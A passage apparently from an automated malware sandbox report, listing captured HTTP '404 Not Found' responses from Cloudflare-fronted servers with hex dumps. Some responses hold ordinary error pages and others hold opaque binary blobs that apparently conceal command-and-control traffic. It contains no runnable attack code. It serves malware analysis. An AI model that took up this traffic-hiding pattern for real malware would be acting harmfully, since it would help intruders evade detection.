e7 8c 03 31 86 6a da 0d d8 d6 c4 39 45 06 a7 92 40 bc b7 0c ee a1 e3 2d e7 7f ff 08 9e 1a e4 a2 39 f6 af eb 37 f9 22 7e d2 9a 52 2e a6 c0 ce 7d 15 3c f7 86 de a3 9b c7 d1 a6 f5 37 e4 1d 47 e4 a8 f1 e3 34 b5 9d 6b e1 c6 0f 1e c2 d1 4c 69 46 31 be 52 37 2a 13 f1 90 bb 5e 00 af bd cf d3 34 dc cd 26 20 32 30 1e 71 18 15 45 d5 f8 9e 0c 94 79 ea b4 f4 f6 da 66 24 c8 7b 72 72 58 6f 47 16 74 8a bd ad 34 13 13 7d 27 a1 79 5d b2 03 f1 af 97 4a cd 31 e2 5d d4 33 e6 16 91 9e fa ae ac e7 2e be bd 94 e8 0e d8 7b bc f4 e5 63 8c d4 89 47 d2 c8 81 4f 81 4f f3 55 43 56 9b 62 c8 4b 42 b3 0a f7 40 ec 9a 8a a3 0e c2 c8 6e 35 97 c7 a8 aa 86 3a 19 e2 ca 43 2a be 48 8a 79 b3 54 Data Ascii: 3830=Zq <`~E&oCW74o8s#u!}1k-AQY^.%k*0.%sJ& ADi~/EOw9j3N F}O?nbZ@"y*&PDhkv)*ss;Ieus60Qnv4a)H4Q'{7@5r~s45T9ZXrJ=Y
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=O0GPtpWaEUghJ1RZgPxRZQ%2FbNvsXTqmfccmnAAfZK01bYa7QRlFfHiPsPzV%2B8T2jJ8DeWoywcL6xPCJBdp7L9%2FnTqte%2FpemWOANEEJHqywZ2CzA9%2BaG3w6ui%2Fn2Kk%2Bd3Mg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979c49ffd8775c-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=iQopJci%2FORQ7R2gzSi1W37HimXMOqa5r2FwomB83BIDxGz5qQDusFANJR4n92C%2Fm0zzmMJ9%2Fc1Wd4iOzO47rUnhTpPC7ayhqY0VR3OS%2BwcA%2FIiNAYrugixuONmn1fsT7vg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979c4ac937775c-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KflXCBDDGP50V0sC8JW5W1jfd6Byw5tcbluoCjWwjmwE6FZk4KlQ00lV1sByV2VEcvGqIx6dtEPZ18YJFdSQj7V%2FAABMhHRWqOQqb%2Bir1mXW5Un3kwGwbWdWAAVzXUv4%2BA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979c4b7a72775c-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 37 61 32 37 0d 0a 00 00 b4 60 3b d4 0f 1a 40 10 16 30 8f b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 53 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 1d 8f e2 e3 b3 98 30 06 81 8f f1 83 0e 25 a6 79 5e 5c 51 fb 32 35 47 48 3b fe cc bd 6c 62 ad 5d 6f 38 6d 57 12 73 36 18 28 a6 70 a3 d1 43 36 2f a4 14 0f 85 c2 e7 27 c2 25 7b ba 49 79 b9 53 68 47 8f 2a f5 db fa 6a c6 86 04 12 fc 2a 54 e9 30 f6 c7 35 f3 73 07 03 d2 1f f9 d8 fa e0 b3 89 71 cd 37 33 33 d1 68 73 45 7c 1f 57 44 8d e8 be 3c 50 35 51 fe 08 22 b9 7f 18 66 3d 28 2a 87 6a dd d6 be db 43 11 5c 53 a6 cd f6 4d 55 64 91 54 5b fd 55 19 d0 ed 05 70 b1 17 22 58 4a 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 fa cb 1f 9e 1d 09 52 2b e5 8d 83 7b 7e 45 f7 ff 28 c8 55 db 88 0c 15 13 b7 99 a3 b8 24 08 4f c5 03 a1 cb a1 81 7e 50 54 62 b8 1b 0e 7e f1 ac 9a a5 6e d0 a0 c1 b9 dd 7a 91 28 4d 19 e0 3c 95 a9 18 da f6 96 be 25 11 61 9a c4 3e 7c 88 2a c8 48 6f a1 c0 4a 9a 03 fd ec 9a aa 7b ac 87 2f bd 61 0d e0 40 bf 46 30 fd f8 12 6c 33 6c 2b 7c 0b 8d c7 fd e4 0e a4 eb 7e 71 eb 80 e5 1a 68 8b 4a d8 19 ae cc 4f 2b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2e b9 d4 fe cc 23 b2 15 0a 31 79 2a 88 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 11 38 27 a0 54 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 92 0e ff 9d 
7f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 1f 5e a1 90 4e a1 54 55 a5 8e b7 1b 6f c3 cb 29 71 67 a3 1e 1e 54 ab 1e 06 d1 12 ee c3 de 57 a3 4c b3 86 1f d4 58 68 91 9c 29 06 f1 2c 5e ae 03 5b e5 1f e4 86 7d 10 ff 54 f8 8d f1 99 07 99 8a 75 c4 7f 74 79 90 6e 43 cc 9b 8b 8b e1 d0 79 d7 9c 88 c3 e0 2b a9 b4 bb 01 7a 17 28 92 ae 46 df 92 f2 f9 7a 8f f6 6b e3 30 dd d9 37 00 70 e0 1c c9 20 f5 52 48 10 39 96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 03 eb ac 58 58 07 6b ab f6 ae 25 2e 39 86 ce ec 35 98 c7 a7 0d ba ca d4 5f fd 40 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 81 c4 a1 f3 0b 0f Data Ascii: 7a27`;@0,xO}q4 SJ%9Wd8IkDJ8P>0%y^\Q25GH;lb]o8mWs6(pC6/'%{IyShG*j*T05sq733hsE|WD<P5Q"f=(*jC\SMUdT[Up"XJ3Ob>!Z:V?#BSSR+{~E(U$O~PTb~nz(M<%a>|*HoJ{/a
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gVzVkIdvGHsVsbVyl9qAqELjnheZhBTdilA%2FYBYYtREmG4AyMm4OPYAxgHFpqQapv5gTS9596QNG3zC6tPloLNgs8wbYWc4crSz5o%2B4h5M906%2Bs3BtDtaZekkH6EH5fupw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979c4fabd6775c-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jf8tuzyNHiGxIa0zvNaFROwVGFGkC4p2vORRtZV0p2ZOe0B1kIYqrEM0kvT7CeOTEV1qoMR%2BEf0nMkgAuYg24NYAWaYTLi85XF774%2BdgXwTaJ92PdTrQ36d5TElqeKgC2A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979c506d58775c-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 34 64 63 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 fd 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 f3 dd 04 32 ea 42 12 5b 46 12 e9 97 9a 81 35 54 01 13 96 75 50 bf d8 5d 92 a7 0a d6 30 71 33 94 a3 7c f7 e2 3e 59 57 e3 c6 68 c5 9b 3b 73 51 59 64 64 b8 d8 f9 20 3d 8f 58 93 e0 7a bb f8 db e4 63 48 c7 01 a0 b0 4d f2 16 85 c5 fc 90 13 19 77 bf 6c 13 d9 7b 64 58 ed 33 4f 62 3e 15 21 0b 5a f3 43 93 3a 1a 3e cf 00 40 ab d1 74 d7 07 53 53 fa cb 1f 9e fd 09 50 2a ee 8c 8a 7b 7e c1 f6 ff 78 ff 5e db c4 0d 13 13 3f 68 e1 92 24 18 4f c5 03 01 ca a1 61 7e 9e f5 69 a9 19 17 7e 5d af 9a a0 44 c9 a0 c1 b9 dd 7a 08 90 4e 19 e0 2c 95 a9 18 2a f8 96 be 21 51 61 1a 06 32 7c 8a 28 c8 c9 6b a1 d0 4a 9a 13 fd ec 9e aa 6b ac 87 3f bd 61 0d c0 5d bf 56 34 fd f8 12 6c 33 6c 29 7c 0a 8d 5b 7a e5 0e f4 eb 7e 71 eb b0 fe 1a 20 58 4b d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 27 b9 52 e0 cc 23 82 67 0e 31 65 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 43 9d cc 46 99 48 15 ac af eb d9 55 3d af ba 68 92 1e ff 9d 9f 
7e 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 33 44 77 29 f8 70 17 4b 23 e9 de 8e 82 11 e8 e4 1f da a0 90 4e a5 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 3e 54 ab 7e 08 19 70 9a a2 ce 57 a3 f4 94 8c 1f d4 fc 69 91 9c 4b 0f f1 2c d6 af 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 4a e3 96 0c 06 1a 50 6d 43 84 7a 8a 8b e1 52 71 d7 9c 4c c2 e0 2b 43 be bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b a3 e3 a2 bc 5b 6f e3 e3 1c 35 02 f5 52 48 c4 37 96 4d ef e7 17 3f 72 e9 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca c2 cf 25 6c 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 Data Ascii: 4dc`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*2B[F5TuP]0q3|>YWh;sQYdd =XzcHMwl{dX3Ob>!ZC:>@tSSP*{~x^?h$Oa~i~]DzN,*!Qa2|(kJk
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kdrk%2BI3TPzzBSGru%2FZEBLzbK6IgPFNf7GuUwJsCxPOzjgxe54ZHXJixzmEotD9trkIwKBrHM02OlQ4YtgVuES87UGuDnAAjYSLb5F282Yh7iSD1e3epB5Pac2behNs%2FXZw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979c5b3aa7775c-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CPdcGF13lhzY81sJOmlQQo9XpKs43HfMQcJl4zhOPMgh1M39btdzSClGR9q35TZZMfB41g32XuN4asjL9EB9HYKs0aXOk9tRL87VTP9fzSINEHLMszfR8NQu0DrSDC09ww%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979c5c0c08775c-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 32 35 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 49 c0 5f 80 07 8a b8 57 f7 67 a4 78 0a 4a 79 f5 7e 01 0d 0a Data Ascii: 25Uys/~(`:I_WgxJy~
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1Uzncdx4UMuhhUiRX5VkaPAAPefJwrVL%2FeEUCMxcP28gJiPeZ2n1M8%2FpL5rgZ46yx%2B47aHj56DDb3aCHXRuSJ3wnzMfkdrtwFzgPn5gieoDAL2le%2Bd49cLsNgwDjAEQrwQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979c639b89775c-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qMvBT1UAbtskSjA7MFZ%2BYE11ESQPWfYbRHugTjF1DQ4quWuCnsXZggfTxhgw7%2FFuC%2BTRhR9asexvZr%2BjbCNLDhMeuEnKYi96u9IXpaAcvYdQjs1XJTje%2F%2FP95UANk09ahw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979c65af4d775c-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oG%2Fvt0bxAC7zNxZx6Tvp2jebR7Lx4OE77NKgStoJpZ5S%2BhUwOQ1tVRHVsh4x7UDYmlcfGs4ZZ7ufMqX%2BbzdmFgQd1ITGUQfhyOSAG798vGKcJQ7hcD1esJYh5ZO%2BobdZQg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979c6719c5775c-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 32 66 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 4c c2 48 9f 00 81 b8 51 f5 7a bf 7b 14 0c 78 f9 68 10 61 9e 4b 26 08 72 9f a8 9c b9 0d 0a Data Ascii: 2fUys/~(`:LHQz{xhaK&r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yksv3kmO87MHRsnm6qb2P%2FM4BWUhSUWtLt9yuq3UkenKr3%2FkCQGyMnUCW6wSU%2F9Exi0OdFydm8XkeuIXNt0CfIv%2FL8Gu8bl%2Fb4W%2FYZbnjOnIqi1aK%2FRy3TtrJg3qmCT9wg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979ca98ae8775c-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 